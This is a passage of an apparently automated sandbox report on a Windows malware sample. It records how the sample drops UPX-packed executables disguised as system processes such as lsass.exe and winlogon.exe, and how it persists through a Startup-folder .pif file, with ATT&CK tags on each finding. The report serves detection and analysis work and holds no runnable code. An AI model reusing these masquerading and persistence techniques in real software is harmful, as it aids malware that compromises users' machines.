\"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"CSRSS .exe\" has an writable section named \"UPX0\"\n \"CSRSS .exe\" has an writable section named \"UPX1\"\n \"CSRSS .exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"\n \"Empty.pif\" has an writable section named \"UPX1\"\n \"Empty.pif\" has an writable section named \".rsrc\"\n \"WINLOGON.EXE.bin\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an executable section named \"UPX0\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"CSRSS .exe\" has an executable section named \"UPX0\"\n \"CSRSS .exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"\n \"SERVICES.EXE\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9C456.bin\" has an executable section named \"UPX0\"\n \"4K51K4.EXE.67A9C456.bin\" has an executable section named \"UPX1\"\n \"SMSS.EXE\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS .exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C456.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C711.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C458.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\users\\desktop.ini\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5648)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5648)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5900)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 5900)\n \"IExplorer.exe\" queries basic process information of the \"C:\\4K51K4\\New Folder.exe\" (UID: 5744)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5744)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 5852)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5852)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe.cfg\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe.cfg\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe.Local\\\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" trying to access non-existent file \"C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\4k51k4.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\smss.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C456.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C711.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C458.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C8F5.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9CBEA.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005968)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005832)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005852)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00006092)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00006100)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004192)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb617648bf2d000090fd7f9a5cc57700f0fd7f50c712004490fd7f00000000400000003f000000200000000090fd7f44c71200c15cc5776082cc77200000000090fd7f9a5cc57700f0fd7f68c712005789c4778083cc771317c675d8eb6176 (UID: 00000000-00005648)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c47798010000a0010000d21bdb01d01bdb010016db010000d801e414db0188000000880000001768c4779817db01ff2bc47701ccd177a41bdb01ac011b0000001b000000d801c06dd8011200a200ab040000c06dd8015016db01100000000000000013009d00ab040000c06dd801 (UID: 00000000-00005900)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 